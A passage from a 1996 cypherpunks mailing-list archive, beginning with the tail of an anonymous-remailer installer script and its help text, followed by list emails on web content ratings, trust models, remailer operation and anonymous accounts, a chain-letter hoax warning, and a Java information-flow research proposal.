> Anon-To: recipient1@site1.org
> Cutmarks: --
> 
> Message one.
> --
> ::
> Anon-To: recipient2@site2.org
> 
> ##
> Subject: message 2
> 
> Message two.

The two messages will be delivered seperately.

For added security, you can encrypt your messages to the remailer with PGP.
The remailer software will decrypt the message and send it on.  Here is the
remailer's public key:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.3a

mQCKAi3vhFUAAAED6KSE5JwFAstBYAUEASfQCEr1wA+1YsWZl7nlNBA8Xq4YSwl
eLCy9oiTDisxsxxxcbQdMtBTFcgQ2GVq7NhhjCEQkRzFRzPOG87T+0aUSufqD2R
PYnwacPDpiTUe/TobHMs/Ov+yDuji0bIacveflubU8DvHLjHgI58Jgk1AAURtCR
bm9ueW1vdXMgUmVtYWlsZXIgPGdoaW9Aa2Fpd2FuLmNvbT=
=v5cv
-----END PGP PUBLIC KEY BLOCK-----

To utilize this feature, create a message with two colons on the first line,
then the Anon-To line, then any other headers, such as cutmarks or latency,
then a blank line, and then the message.  Encrypt this with the remailer's
public key.  Then send it to the remailer, adding the header \"Encrypted: PGP\".
If you forget this, the remailer won't know that it needs to be decrypted.
Also be sure to use the -t option with PGP, or the linefeeds might not be
handled properly.

> To: $xaddr
> From: me@mysite.org
>
> ::
> Encrypted: PGP
>
> -----BEGIN PGP MESSAGE-----
> Version: 2.3a
>
> hIkCuMeAjnwmCTUBA+dfWcFk/fLRpm4ZM7A23iONxkOGDL6D0FyRi/r0P8+pH2gf
> HAi4+1BHUhXDCW2LfLfay5JwHBNMtcdbgXiQVXIm0cHM0zgf9hBroIM9W+B2Z07i
> 6UN3BDhiTSJBCTZUGQ7DrkltbgoyRhNTgrzQRR8FSQQXSo/cf4po0vCezKYAAABP
> smG6rgPhdtWlynKSZR6Gd2W3S/5pa+Qd+OD2nN1TWepINgjXVHrCt0kLOY6nVFNQ
> U7lPLDihXw/+PPJclxwvUeCSygmP+peB1lPrhSiAVA==
> =da+F
> -----END PGP MESSAGE-----

Any unencrypted text after the PGP message is also remailed.  This is to
allow sending to someone who is anonymous.  If you create a PGP-encrypted
message to yourself via my remailer, and then you give it to someone, they
can send you a message by sending the encrypted message to the remailer.
The remailer will then decrypt it and send it to you.  The message gets
anonymized in the process, so the sender will need to include a return
address if he wants a reply.

Messages sent this way can be encrypted using the Encrypt-Key: feature.
Any text following a line beginning with ** will be encrypted with this
key.  For example, if you put in your PGP message:

> ::
> Anon-To: you@yourhost.org
> Encrypt-Key: your_password
> 
> **

The appended message after the ** will be encrypted with the key 
\"your_password\", using PGP's conventional encryption option.  


Abuse Policy:
I consider the following to be inappropriate use of this anonymous remailer,
and will take steps to prevent anyone from doing any of the following:
- Sending messages intended primarilly to be harassing or annoying.
- Use of the remailer for any illegal purpose.
If you don't want to receive anonymous mail, send me a message, and I will
add your email address to the block list.

You can get a list of statistics on remailer usage by sending mail to
$xaddr with Subject: remailer-stats
" | tee -a remailer-help > /dev/null

cd $HOME
echo "|$xdir/RM" > .forward
echo -e "\n"
echo "
Ok, i've installed a very basic type one remailer.
If you want to support Mixmaster, PGP, or other 
features, check the source code in $xdir/remailer.c 
and make appropriate changes, then type:

 \"gcc -o RM remailer.c\"

If you don't care to support these features, then your 
remailer should now be fully functional.
"








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kent Briggs <72124.3234@compuserve.com>
Date: Fri, 10 May 1996 14:51:44 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: hks newsgroup
Message-ID: <960509153645_72124.3234_EHJ151-2@CompuServe.COM>
MIME-Version: 1.0
Content-Type: text/plain


hks.lists.cypherpunks has shown no new articles in the past three weeks.  I've
resubscribed to the mailing list but have seen no mention of the newsgroup's
status.  What happened to hks and is it ever coming back up?

Kent





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 10 May 1996 19:34:31 +0800
To: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Subject: Re: Mandatory Voluntary Self-Ratings
In-Reply-To: <9605091517.AA09590@rpcp.mit.edu>
Message-ID: <199605091846.LAA28295@netcom12.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


JR:

>        I've figured out where my differences between myself and others
>lay. The _only_ system and service that I am aware of that is distributing
>PICS labels is RSAC. (http://www.rsac.org) They are what one could call an
>objective and non-arbitrary content rating system rather than an
>"appropriateness" system. 

I don't like the use of the term "objective" here. (I object!!)
this is the point that I brought up in an earlier post: some people
seem to think that a label like "sex: moderate" is in fact an
"objective" label. but it is a subjective judgement. perhaps
a judgement like "child approved" is more subjective than "sex: moderate",
but they are both value judgements.

"objective" is a pretty important term to apply to anything, including
ratings. I'd like to see it reserved for systems that require no
human judgement whatsoever, i.e. are automated. for example, I would
say that a engine that creates ratings based on keywords found in
a document would be "objective". but anything that involves a human
decision cannot be called "objective" in my view.

the RSAC system seems somewhat reasonable to me. it appears to predate
PICS somewhat and picked up on it once it was available.

this from the web site you mention, in the press releases section:

>   The RSACi rating system is a fully-automated, paperless system that     
>   relies on a quick, easy-to-use questionnaire that the Web master
>   completes at RSAC's homepage for free. The questionnaire runs through
>   a series of highly specific questions about the level, nature and
>   intensity of the sex, nudity, violence, offensive language (vulgar or
>   hate-motivated) found within the Web master's site.                   
>   
>   Once completed, the questionnaire is then submitted electronically to
>   the RSAC Web Server, which tabulates the results and produces the html
>   advisory tags that the Web master then places on their Web site/page.
>
>   A standard Internet browser, or blocking device that has been
>   configured to read the RSACi system can recognize these tags, enabling
>   parents who use the browser to either allow or restrict their    
>   children's access to any single rating or combination of ratings.  

now, it seems that the author might as well put the tags in his material
himself instead of going through this submission process. furthermore
I again object that this be called an "objective" system. first, the
author of the page has to properly answer the questionaire. secondly,
we are talking about the author himself, not an impartial third party.
even if the the rating party was not the author, I would hesitate to
call it "objective". (unfortunately "objective" is a term applied to
things like newspapers that have detectable slants. what I guess is
that we have an objective-subjective continuum, and imho only purely
computational, algorithmic processes are truly "objective").

also, above we have the claim it is "fully automated". what??? it
sounded to me like the page designer has to submit a special form
to this service and then go and grab the tags to manually put in his own
page? this is "fully automated"??? 

I'm glad that RSAC is doing what they are doing, but the above system
is not objective, and neither is it a "market rating" in the sense
I described-- a third-party rating by someone other than the creator or 
author of the document.

also, JR, you say the system does not determine "appropriateness". 
but in my view it does indirectly. an author can "falsify" his submission
to say that his page has no sex or violence. (who is to say he is
wrong? the internet ratings police?) this will implicitly determine
the "appropriateness" of his page for people who screen their
browswers based on the keywords that were affected.

in general, I think all the examples I have seen so far show the
superiority of a third-party market-rating system over self-ratings.

self ratings can be corrupted and falsified by creators. third-party
ratings are more useful imho because you have a third party with their
own agenda, and you implicitly agree to their agenda. you don't
know the agenda of the author of the document, but you do, roughly,
of the rating service. (i.e. they might be "Christian Coalition, 
Atheist Zealots", or whatever)

self-ratings have the problem that people are going to pressure page
writers to include certain kinds of tags. third-party ratings have
no such deficiency. in fact the system is invisible to the page 
creator, as it should be. (in my view ratings and the content should
be made as independent from each other as possible in the sense
that ratings are not tied up in the content itself)

if the above is any measure,
RSAC press releases are awfully misleading based on their uses of
terminology and I hope they get their act together in this regard.

if there is a market-driven RSAC rating thing going on not described
in the above article, I'd like to see it. but the above excerpt does
not describe a market-driven system.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@MICROSOFT.com>
Date: Fri, 10 May 1996 21:05:22 +0800
To: "'cypherpunks@toad.com>
Subject: RE: self-ratings vs. market ratings
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-960509184843Z-20923@tide21.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: 	Vladimir Z. Nuri
>
>you are free to assume any connotation you like. but in my view
>they are pretty much interchangeable. they are both "meta
>information"-- information about other things or information.
...............................................................

The fact that I, like others, am "free to assume" any connotation means
that there easily can exist confusion surrounding the definitions of
these terms, and that this can then create controversy in discussions
over what anyone means when they make references to them.

Those who intend to apply these concepts must determine what they think
they are doing (rating content, or establishing someone's reputation?)
and must communicate it to others clearly so as to be definitely
understood, else risk further compounding of confusion.

The word & the concept of "reputation" has been in use for much longer
than "rating".   In the most recent applications of the term "rating",
the idea has evolved to include such things as electronic web page
content.   It refers to a deliberate, conscious intent to establish a
measure, an estimate, or evaluation, of something that an individual or
group presents (information) or provides (service).   The rating is
intentionally applied and is intended to be used for communicating to
those who are seeking this specific kind of information, where a
reputation evolves "on its own", so to speak, as a coincidence of being
generally known.

"Reputation" is more a passive reference to the past, where "rating"  is
actively in regard of a present condition (with future expectations).

[These are just comments I have on this subject; I myself don't pay much
attention to ratings, as my own measures of things & people tend to be
quite different from most, and therefore not very useful for my
purposes.  So that's all I have to say about it, "Vlad".]

    ..
Blanc

>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Fri, 10 May 1996 16:23:21 +0800
To: cypherpunks@toad.com
Subject: Re: Mandatory Voluntary Self-Ratings
Message-ID: <2.2.32.19960509025839.0068623c@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 11:17 AM 05/9/96 -0400, Joseph M. Reagle Jr. <reagle@MIT.EDU> wrote:
>>        I've figured out where my differences between myself and others
>lay. The _only_ system and service that I am aware of that is distributing
>PICS labels is RSAC. (http://www.rsac.org) They are what one could call an
>objective and non-arbitrary content rating system rather than an
>"appropriateness" system. "Appropriateness" systems will be valuable 3rd
>party systems when the vigilantes and fundamentalists wish to create label
>bureaus. For self labeling, if many people (main stream people) are going to
>use that system within their browser, it will have to have mind share. If
>it's going to have mind share, I think it would be advantegeous to it to be
>a descriptive label rather than "appropriate." Hence, much of the concerns
>I'm hearing aren't so worrisome to me.

SurfWatch is offering self-rating via a web page at their site. It spits
back the appropriate 'meta' tags to embed in an html document.

Dave Merriman

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMZFQ+MVrTvyYOzAZAQFM+gP/edsvNSSkeiyZVBuJyWYCK82J7O1zG5O8
jI5cGj22R/qSPAhhpZj6pLFxvoKnuUc7P+8QzAao1ccxihZpy5ZW3fzM/+pyn6dW
B126/l4R+SRCrDiPV+5HeXyBTXAiWYMjRAuv2nZtHVIiLjQrjziwrug4H/4U26GP
NEbKT8Uqwno=
=UAbu
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
http://www.shellback.com/personal/merriman/index.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Date: Fri, 10 May 1996 15:22:17 +0800
To: cypherpunks@toad.com
Subject: Applicable Models for Trust Calculations (Re: Dempster-Shafer Theory and Belief Networks (Re: Transitive trust))
Message-ID: <9605091628.AA10495@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 09:51 PM 5/7/96 -0700, Timothy C. May wrote:

>In particular, one form of belief representation seems especially relevant:
>Dempster-Shafer theory.

Two quick things: (more in my forthcoming thesis)

1. It is very instructive to consider systems for considering trust and
belief (and Dempster-Shafer is a rather nice one). However, these systems
(my own decision analysis discussion to a degree, but less so with respect
to information gathering) and Dempster-Shafer in particular require the
events to be independent:

"Further, Dempster-Shafer theory provides rules for combining probabilities
and thus for propagating measures through the system. This fourth point is
possibly the most attractive, but it is also one of the most controversial
since the propagation method is an extension of the multiplication rule for
independent events. Since many of the applications involve events that are
surely dependent, that rule is, by classical statistical criteria,
inapplicable. The tendency to assume that events are independent unless
proven otherwise has stimulated a large proportion of the criticism of
probability approaches; as it stands, Dempster-Shafer theory suffers the
same ill" [Shapiro (ed.) Encyclopedia of Aritificial Intelligence.
/Reasoning, Default./ p 846.]

The very term "Web of Trust" makes one pause with respect to independent events.

2. Just as a comment, it seems there are different meaning of "transitiviy"
in related but different disciplines, for instance in value and utility
functions, one requires transitivity, but in a way different from what Hal
discusses:

"For any three possible set os of consequences, X1, X2, and X3, if X1 > X2
and X2 > X3 then the preference is transitive such that X1 > X3."

[deNeufville, R. Applied Systems Analysis: Engineering Planning and
Technology Management, 1990, p 313.]

This refers to a single person's preferences (rather than 3 individuals in a
"network.")
_______________________
Regards,       Men govern nothing with more difficulty than their tongues,
               and can moderate their desires more than their words. -Spinoza
Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 10 May 1996 21:01:44 +0800
To: Robin Powell <rpowell@algorithmics.com>
Subject: Re: Why I Pay Too Much in Taxes
In-Reply-To: <96May9.133344edt.20486@janus.algorithmics.com>
Message-ID: <Pine.SUN.3.93.960509133137.5395A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 9 May 1996, Robin Powell wrote:

> >>>>> Black Unicorn <unicorn@schloss.li> writes:
> 
>     >> By the way, are there any PGP encrypted mailing lists for
>     >> discussing serious tax fraud?
> 
>     > If such a list existed, would we tell an anonymous poster/fed?
> 
> Well, if such a list does exist, I would like to know about it.
> 
> -Robin
> 

Again, in the absence of any credentials or recommendation, I can't see
how the moderators/originators/managers of such a list would disclose the
details of its publication.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robin Powell <rpowell@algorithmics.com>
Date: Fri, 10 May 1996 16:56:04 +0800
To: unicorn@schloss.li
Subject: Re: Why I Pay Too Much in Taxes
In-Reply-To: <Pine.SUN.3.93.960507223421.339P-100000@polaris.mindport.net>
Message-ID: <96May9.133344edt.20486@janus.algorithmics.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> Black Unicorn <unicorn@schloss.li> writes:

    >> By the way, are there any PGP encrypted mailing lists for
    >> discussing serious tax fraud?

    > If such a list existed, would we tell an anonymous poster/fed?

Well, if such a list does exist, I would like to know about it.

-Robin




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven L Baur <steve@miranova.com>
Date: Fri, 10 May 1996 19:55:35 +0800
To: rick hoselton <hoz@univel.telescan.com>
Subject: Re: self-ratings
In-Reply-To: <199605082327.QAA26350@toad.com>
Message-ID: <m2zq7ha8ez.fsf@deanna.miranova.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "rick" == rick hoselton <hoz@univel.telescan.com> writes:

rick> Now, if everyone follows my advice, the net may become very
rick> boring for those who have their filters set on, but congress
rick> will NEVER make "being boring" against the law.

You overestimate the collective intelligence of the U.S. Congress.

-- 
steve@miranova.com baur
Unsolicited commercial e-mail will be proofread for $250/hour.
Andrea Seastrand: For your vote on the Telecom bill, I will vote for anyone
except you in November.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robin Powell <rpowell@algorithmics.com>
Date: Fri, 10 May 1996 19:01:53 +0800
To: qut@netcom.com
Subject: Re: remailer@utopia.hacktic.nl down
In-Reply-To: <199605090211.TAA22230@netcom4.netcom.com>
Message-ID: <96May9.135632edt.20486@janus.algorithmics.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> qut@netcom.com (Dave Harman) writes:

    >> 
    >> Alex de Joode wrote:
    >> > 
    >> > -----BEGIN PGP SIGNED MESSAGE-----
    >> 
    >> > Due to recent events the Hacktic Foundation has decided to
    >> > discontinue its remailing operations, the remailer that is
    >> > operated by the Hacktic Foundation will cease to exist May
    >> > 20th.
    >> 
    >> Co$, I'll wager.  Just shows to go ya.

    > Perhaps Co$ was behind the recent spamming of
    > alt.politics.white-power.  Scientology is 
    > virulently anti-racist.

Interesting, given that Massah Elron (L. Ron Hubbard) was virulently
racist.  

-Robin







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lance Cottrell <loki@obscura.com>
Date: Fri, 10 May 1996 21:30:07 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Remailer in a box
In-Reply-To: <01I4IDOS8GT88Y5B50@mbcl.rutgers.edu>
Message-ID: <Pine.SOL.3.91.960509144958.23367A-100000@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 9 May 1996, E. ALLEN SMITH wrote:

> From:	IN%"loki@infonex.com"  9-MAY-1996 00:59:47.21
> 
> >This could be done with a trivial modification to the source and
> >destination blocking lists (just change the sense of the checking).
> 
> 	In other words, just change them from blocking to allowance? How much
> technical knowledge does this take? I can see doing the incoming with procmail.

It is fairly simple. There are just two subroutines which check the two 
lists, and return a flag indicating whether to trash the message. Just 
change it only send if a match is found. It is just a simple strstr in a 
text file.

> 
> >Cyberpass (www.cyberpass.net) offers UNIX accounts without dialin access
> >for $7 per month. These are available anonymously, and can be paid for with
> >ecash.
> 
> 	Interesting. Having ones at other than c2.org is useful for backup
> purposes.
> 

Can't let Sameer be the ONLY privacy provider on the Internet ;)

> >Yes, but I only give it to remailer operators. The "bramble" might get
> >flooded otherwise. Operators see the repercussions of their actions.
> 
> 	Does it use how busy the remailer is to determine the approximate
> frequency of the messages, or does it just keep on going with whatever you
> tell it?
> 	Thanks,
> 	-Allen
> 

The pinger is completely autonomous. It just sends chained messages 
through random chains at random times. There are a handfull of these 
running now. They make up a fair fraction of all Mixmaster remailer 
traffic (it is impossible to know exactly how much).

	-Lance

-------------------------------------
Lance Cottrell   loki@infonex.com
President Infonex Internet Services
http://www.Infonex.com
-------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lance Cottrell <loki@obscura.com>
Date: Fri, 10 May 1996 20:52:45 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Remailer in a box
In-Reply-To: <01I4IDYWGXEQ8Y5B50@mbcl.rutgers.edu>
Message-ID: <Pine.SOL.3.91.960509145524.23367B-100000@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 9 May 1996, E. ALLEN SMITH wrote:

> From:	IN%"loki@infonex.com"  9-MAY-1996 00:59:47.21
> 
> >Cyberpass (www.cyberpass.net) offers UNIX accounts without dialin access
> >for $7 per month. These are available anonymously, and can be paid for with
> >ecash.
> 
> 	After taking a look at www.cyberpass.net, I can see why you're
> encoraging people to use it - about like Sameer encouraging people to use
> c2.org.

Guilty

> Your work on remailers does give you some reputation capital, however.
> The signup form isn't very clear about anonymnity, BTW - I suggest dividing it
> into optional and mandatory sections, and stating what will be the policy for
> a lack of the optional ones. What's the 17- vs 18 differentiation for?
> 	Thanks,
> 	-Allen
> 

I am not pushing the anonymous accounts until my laywer finishes the user 
agreement for them. It is a bit of a tricky document (Sameer, want a copy 
when it is done?). The whole site is days away from a complete redesign, 
so I am not putting much effort into the current interface. Thanks for 
the suggestions though.

The >= 18 condition is to cover my butt. Since minors can not be parties 
to contracts, I have no protection with them as clients. I am only a 
provider for adults, and they take full responsibility for any children 
allowed to use the connection. Fuck the CDA, but keep an eye on its claws.

	-Lance

-------------------------------------
Lance Cottrell   loki@infonex.com
President Infonex Internet Services
http://www.Infonex.com
-------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.org
Date: Fri, 10 May 1996 21:26:23 +0800
To: loki@obscura.com (Lance Cottrell)
Subject: Re: Remailer in a box
In-Reply-To: <Pine.SOL.3.91.960509144958.23367A-100000@sirius.infonex.com>
Message-ID: <199605092243.PAA07816@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> > 	Interesting. Having ones at other than c2.org is useful for backup
> > purposes.
> > 

	Also useful for chaining purposes.


-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.net/ (or login as "guest")		sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Clay.Olbon@dynetics.com (Clay Olbon II)
Date: Fri, 10 May 1996 22:24:44 +0800
To: "Husa, Carl (MSX)" <cypherpunks@toad.com
Subject: Re: FW: Science Project Fair
Message-ID: <v01540b01adb7f7ff2513@[193.239.225.200]>
MIME-Version: 1.0
Content-Type: text/plain


Deja vu all over again.  This was forwarded to me by someone within my
company a while back.  I may be cynical, but the chances of this being a
hoax are just too high - it is simply too easy to send out a message like
this to get an email address mailbombed.  I recommend against replying to
this.

        Clay


At 7:20 AM 5/9/96, Husa, Carl (MSX) wrote:
>>----------
>>From:  Beverly. Ferguson[SMTP:103014.3727@CompuServe.COM]
>>Sent:  Wednesday, May 08, 1996 9:38 PM
>>To:    KOMBUCHA DIGEST; PARACELSUS DIGEST
>>Subject:       Science Project Fair
>>
>>
>>Originally Posted To:
>>
>>>Date:         Fri, 3 May 1996 09:58:55 -0400
>>>Sender:       Methods of Teaching Mathematics <TEACHMAT@UICVM.UIC.EDU>
>>>From:         Peggy R Shearin <pshearin@WARREN.CES.NCSU.EDU>
>>>Subject:      Science Fair Project
>>
>>>>Hi, our names are Stevie and Amanda. We are in the 5th grade at
>>>>the Phillipston Memorial school, Phillipston, Massachusetts, USA.
>>>>We are doing a science project on the Internet. We want to see
>>>>how many responses we can get back in two weeks. (We are only
>>>>sending out 2 letters).
>>
>>>>Please respond and then send this letter to anyone you
>>>>communicate with on the Internet.
>>
>>>>Respond to smc@tiac.net.
>>>>^^^^^^^^^^^^^^^^^^^^^^^
>>
>>>>1. Where do you live (state and country)?
>>
>>
>>>>2. From whom did you get this letter?
>>
>>
>>>>Thank you,
>>>>Stevie and Amanda
>>
>>------------------------------
>>
>>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@it.kth.se>
Date: Fri, 10 May 1996 21:06:53 +0800
To: cypherpunks@toad.com
Subject: Runtime info flow in Java
Message-ID: <199605091506.RAA29550@piraya.electrum.kth.se>
MIME-Version: 1.0
Content-Type: text/plain



Hi!

I'm presenting my licentiate research proposal
next week, and I thought that some of you might
find it interesting. I'd like to find others
that are working with similar projects, to have
some people to discuss with.

The actual proposal is available at 

     http://www.it.kth.se/~cwe/phd/licprop.ps

I've included an abstract below.

Comments are most welcome.

Regards,
	Christian Wettergren
	KTH/Teleinformatics.



Licentiate Thesis Proposal Seminar 
==================================

Title: "Runtime Information Flow Analysis and Security" 

Candidate: Christian Wettergren
Time:      Wednesday, 15th May, 15:00--16:00
Place:     Room Telegrafen, Dept. of Teleinformatics, KTH, 
           Electrum Bldg., lift B, 5th floor, Kistagangen 16, 
           16440 Kista, Sweden
Committee: Gerald Maguire, KTH/Teleinformatics
           Sead Muftic, SU/DSV
           Enn Tuygu, KTH/Teleinformatics

Abstract:

Today's computer security systems are fragile and brittle. I
believe this statement to be consistent with practical experiences.
One can for example observe the regularity of alerts from CERT. 

Many of the problems are caused by data-driven bugs in application 
programs. It is important to find a security paradigm that is more
stable for the communicative and networked world of tomorrow.

I propose a new way of doing information flow analysis of programs.
This information flow analysis is done in runtime, and will provide
detailed information about influences of the process to the 
access control decision process. The information flow is based on
sets of subjects instead of preallocated security classes, thus 
decoupling the flow analysis from the access control.

The runtime analysis is performed by special code that is run along
with the original program. It shadows the computation and keeps track
of the information flows within the program. A special compiler
emits this shadow code. I will implement such a compiler for the
Java language. Issues about the compiler and the shadow code will 
be discussed in the thesis. The thesis will also investigate the 
behaviour of the shadow code for programs with different communication
patterns.

For more information contact Christian Wettergren, +46 (0)8-751 14 91,
cwe@it.kth.se. You can also retrieve the licentiate thesis proposal 
from http://www.it.kth.se/~cwe/phd/licprop.ps.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Date: Fri, 10 May 1996 21:13:31 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: Mandatory Voluntary Self-Ratings
Message-ID: <9605092107.AA13747@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Couple quick things:

At 11:46 AM 5/9/96 -0700, you wrote:
>I don't like the use of the term "objective" here. (I object!!)

No, it isn't the best term, there is some bias which can be an issue with
dealing with this at the international level, but I think there are
solutions to that...

>a judgement like "child approved" is more subjective than "sex: moderate",
>but they are both value judgements.

        It doesn't even say "sex: moderate", but "(s 3)", and then the
parent can consult a chart that is a summary of the questions that directly
ask about the content:


		VIOLENCE	
	
ALL (0)  HARMLESS CONFLICT;  SOME DAMAGE TO OBJECTS
1        CREATURES INJURED OR KILLED; DAMAGE TO OBJECTS; FIGHTING
2        HUMANS INJURED OR KILLED WITH SMALL AMOUNT OF BLOOD
3        HUMANS INJURED OR KILLED, BLOOD AND GORE
4        HUMANS INJURED OR KILLED, BLOOD AND GORE	
         WANTON AND GRATUITOUS VIOLENCE TORTURE; RAPE

So we can argue about "objective," but this is _atleast_ very
"non-arbitrary" and the process (if people are non-malicious) is deterministic.

>now, it seems that the author might as well put the tags in his material
>himself instead of going through this submission process.

        This is a significant issue.

>also, above we have the claim it is "fully automated". what??? it
>sounded to me like the page designer has to submit a special form
>to this service and then go and grab the tags to manually put in his own
>page? this is "fully automated"??? 

        Try it for your own page and see!

>also, JR, you say the system does not determine "appropriateness". 
>but in my view it does indirectly. an author can "falsify" his submission
>to say that his page has no sex or violence. (who is to say he is
>wrong? the internet ratings police?) this will implicitly determine
>the "appropriateness" of his page for people who screen their
>browswers based on the keywords that were affected.

        People who misuse the system can be fined. (By using the system one
also has to "AGREE"). However, the status of this contract is up at grabs
IMHO since they relied on trade mark to enforce their system (the pic on a
box). Now, gifs and the like (banners) may still be of issue, but the real
meat here is a system (s 3 l 2 v 0), there is no IP protection for this, and
if there aren't signatures, this can be a serious problem.

>creator, as it should be. (in my view ratings and the content should
>be made as independent from each other as possible in the sense
>that ratings are not tied up in the content itself)

        I see it as an author provided a value added service to his content
same as anyone else.

_______________________
Regards,       Men govern nothing with more difficulty than their tongues,
               and can moderate their desires more than their words. -Spinoza
Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 11 May 1996 08:09:55 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Transitive trust and MLM
In-Reply-To: <01I4IHRSE6Q88Y5BAX@mbcl.rutgers.edu>
Message-ID: <Pine.GUL.3.93.960509165130.25395E-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 9 May 1996, E. ALLEN SMITH wrote:

> From:	IN%"llurch@networking.stanford.edu"  "Rich Graves"  8-MAY-1996
> 04:33:21.44 
> 
> >The fact that you're sending postcards is only a problem if you don't want
> >them to be read. It's more the email I receive that I worry about, so all 
> >my friends use the address rich@alpha.c2.org now.
> 
> 	How would this help? Whoever's wanting to monitor you will just
> monitor rich@alpha.c2.org's incoming mail.

To do that they would need to crack one or more of the accounts with
access to the alpha server, which would probably leave evidence, or run a
packet sniffer nearby. Ironically, I am more confident of the security of
alpha.c2.org than I am of my own machine. The threat profile is people who
have forwarded mail with envelope and Received: headers indicating that
the source is my mail spool to a mailing list. Twice. I know that I'm
surrounded by insecure, non-firewalled UNIX boxes that could be running
packet sniffers, and that is something I cannot fix unless I want to trade
gloriously fast and reliable Ethernet connectivity for a modem. My
correspondents do not have PGP and are not likely to get it. So, a public
alpha nym helps in this (perhaps unique) case.

rich@alpha.c2.org also works as a permanent address (knock on wood).

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lance Cottrell <loki@obscura.com>
Date: Sat, 11 May 1996 10:49:23 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Remailer in a box
In-Reply-To: <01I4IIMHQ67Y8Y5BAX@mbcl.rutgers.edu>
Message-ID: <Pine.SOL.3.91.960509170505.23367E-100000@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 9 May 1996, E. ALLEN SMITH wrote:

> From:	IN%"loki@obscura.com"  "Lance Cottrell"  9-MAY-1996 18:58:23.21
> 
> On Thu, 9 May 1996, E. ALLEN SMITH wrote:
> 
> >I am not pushing the anonymous accounts until my laywer finishes the user 
> >agreement for them. It is a bit of a tricky document (Sameer, want a copy 
> >when it is done?). The whole site is days away from a complete redesign, 
> >so I am not putting much effort into the current interface. Thanks for 
> >the suggestions though.
> 
> 	I suspect that the legal types on cypherpunks would be interested in
> seeing it. Quite welcome on the suggestions.
> 
> >The >= 18 condition is to cover my butt. Since minors can not be parties 
> >to contracts, I have no protection with them as clients. I am only a 
> >provider for adults, and they take full responsibility for any children 
> >allowed to use the connection. Fuck the CDA, but keep an eye on its claws.
> 
> 	I see your difficulty. It is an additional one with respect to
> anonymous accounts. Hmm... you could put the burden on other ISPs by only
> having anonymous accounts via telnet access - and not accepting such from
> k12.edu domains. Bit of a limit, though.
> 	-Allen
> 

I expect the majority of our anonymous account to be telnet. We are 
setting up the contract to make it clear that any contract signed with a 
minor is invalid, and that any access of our system by that individual is 
